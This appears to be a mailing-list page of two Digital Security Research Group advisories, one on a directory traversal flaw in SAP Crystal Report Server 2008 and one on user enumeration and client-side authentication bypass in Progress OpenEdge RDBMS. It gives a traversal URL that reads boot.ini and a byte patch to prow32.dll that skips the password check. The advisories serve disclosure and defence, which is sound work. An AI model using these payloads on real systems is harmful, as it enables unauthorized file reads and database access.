CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-00145] SAP Crystal Reports 2008 - Directory Traversal

ÇDSECRG-11-003  (Internal DSECRG-00145) SAP Crystal Report Server 2008 - 
Directory Traversal 
Directory traversal vulnerability discovered in the module 
PerformanceManagement application SAP Crystal Report Server 2008, which allows 
you to read any file on the OS.

Application:SAP Crystal Report Server 2008
Versions Affected:   SAP Crystal Report Server 2008
Vendor URL: http://sap.com
Bugs:   Directory Traversal File Read
Exploits:YES
Reported:   29.03.2010
Vendor response:30.03.2010
Date of SAPNOTE Published:8.10.2010
Date of Public Advisory:14.01.2011
Authors:Dmitriy Chastuhin
Digital Security Research Group [DSecRG] (research [at] 
dsecrg [dot]com)

Description

SAP Crystal Report Server 2008 contains a variety of features with which users 
can manage and share interactive reports and dashboards, as well as provide 
access to them via the Internet.

Details
***
Directory Traversal vulnerability was found in script qa.jsp
With this vulnerability, an authenticated attacker can read any file on the 
server.

Sample
**
http://sap_server_adr:8080/PerformanceManagement/jsp/qa.jsp?func=browseroot=wipath=../../../../../../boot.ini

References
**

http://dsecrg.com/pages/vul/show.php?id=303
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1476930




Fix Information
*

Solution to this issue is given in the 1476930 security note.

About
*

Digital Security: 

Is one of the leading IT security companies in CEMEA, providing information 
security consulting, audit and penetration testing services, ERP and SAP 
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA 
DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and 
software development for securing business-critical systems like: enterprise 
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking 
software. DSecRG developed new product ERPSCAN security suite for SAP 
NetWeaver and service ERPSCAN Online which can help customers to perform 
automated security assessments and compliance checks for SAP solutions.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com






Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-008] Open Edge RDBMS - Multiple architecture vulnerabilities (UNPATCHED)

Digital Security Research Group [DSecRG] Advisory   #DSECRG-11-008

Application:Progress OpenEdge Enterprise RDBMS
Versions Affected:  10.2A and maybe others
Vendor URL: http://web.progress.com
Bug:Authentication bypass, UserID enumerate
Exploits:   YES
Reported:   13.10.2009
Vendor response:13.10.2009
Solution:   NONE
Date of Public Advisory:24.01.2011
Authors:Alexander Polyakov, Alexey Sintsov, Alexey Troshichev 
of Digital Security Research Group [DSecRG]



Description
***

Progress OpenEdge Enterprise RDBMS (formerly known as the Progress RDBMS) is
a high-efficiency  relational database management system by company Progress
Software Corp productions.It is widely used as backend for cutomezed ERP 
systems.
This RDBMS has some vulnerabilities that make possible 
to enumerate UserID and bypass authentification.

Details
***


1. UserID enumerate

Attacker can get valid UserID. It is possible because OpenEdge RDBMS server 
give different answers for situation when password is incorrect and when 
UserID does not exist. Client application in both way gives the same message
- “Your Password and UserID USERID do not much”. But in network layer 
answers from server are different:

Packet 1. From server to client, if UserID exist (UserID eq AAA):

0x   00 00 00 00 00 01 00 00-00 00 00 02 08 00 45 00   ..E.
0x0010   00 C3 00 00 00 00 40 06-7C 33 7F 00 00 01 7F 00   .A@.|3....
0x0020   00 01 0B B8 10 42 56 07-00 00 00 00 00 00 50 00   ...?.BV...P.
0x0030   40 00 00 00 00 00 00 00-00 07 00 2D 00 9B 00 4F   @..-.›.O
0x0040   00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00   
0x0050   00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   
0x0060   00 00 00 02 00 00 00 01-00 00 7F 68 00 4F FF FB   ..h.Oyu
0x0070   00 00 00 00 00 00 0F 02-00 00 00 00 00 00 00 00   
0x0080   22 C0 E7 00 02 00 3C 01-FB 03 41 41 41 10 72 6D   Acu.AAA.rm
0x0090   57 78 6A 69 64 4E 63 6E-4D 64 6D 69 61 63 03 41   WxjidNcnMdmiac.A
0x00A0   41 41 FA 00 09 FD FD FD-FD FD FD FD FD FF FA 00   AAu..yu.
0x00B0   09 FD FD FD FD FD FD FD-FD FF FD FD FD FD FD FD   .yyy
0x00C0   FD FD FD FD FD FD FD FD-FD FD FD FD FD FD FD FD   
0x00D0   FDy


Packet 2. From server to client, if UserId does not exist:

0x   00 00 00 00 00 01 00 00-00 00 00 02 08 00 45 00   ..E.
0x0010   00 74 00 00 00 00 40 06-7C 82 7F 00 00 01 7F 00   .t@.|‚....
0x0020   00 01 0B B8 10 45 56 07-00 00 00 00 00 00 50 00   ...?.EV...P.
0x0030   40 00 00 00 00 00 00 00-00 07 00 2D 00 4C FB 41   @..-.LuA
0x0040   00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00   
0x0050   00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   
0x0060   00 00 00 02 00 00 00 01-00 00 7F 68 00 00 FF FB   ..h..yu

So attacker can connect to RDBMS server with different UserID and see 
network answers for getting existing UserID.

2. Authentication bypass

Remote attacker can log in into RDBMS use existing or not existing UserID 
without password. It is possible because authentication process is going 
on client side. When password incorrect client application reset connection
with server and show message box. If password is correct, client send to 
server UserID which he will be to use in RDBMS. 

Packet 3. From client to server, when password for UserID TEST2 is correct:

0x   00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00   ..E.
0x0010   00 6E 00 00 00 00 40 06-7C 88 7F 00 00 01 7F 00   .n@.|?....
0x0020   00 01 0B 27 0B B8 13 03-00 00 00 00 00 00 50 00   ...'.?P.
0x0030   40 00 00 00 00 00 00 00-00 09 00 14 00 46 00 00   @F..
0x0040   00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00   
0x0050   00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 73   ..Us
0x0060   65 72 69 64 20 69 73 20-6E 6F 77 20 54 45 53 54   erid is now TEST
0x0070   32 2E 20 28 37 30 38 29-00 00 00 00   2. (708)

Example of attack:

Patch of %OpenEdge%\bin\prow32.dll (for version 10.2A)

Begin address: 0x020065
- 0f85ce02
+ 909090909090

After that run DataAdministration(%OpenEdge%\bin\prowin32.exe) and try to 
enter into RDBMS with any UserID and without password. 
Application show error message box, but allow to enter into RDBMS with 
chosen UserId. If chosen UserID has a Security Administrator privileges, 
so attacker gets this privileges. By default in OpenEdge RDBMS all 
users have  Security Administrator privileges.

Fix Information
***
The only one possible fix is to use Windows authentication instead of 
proprietary.


References
*

http://dsecrg.com/content/vul/edit.php?id=308

[DSECRG-00142] SAP Crystal Reports 2008 - actionNavjsp_xss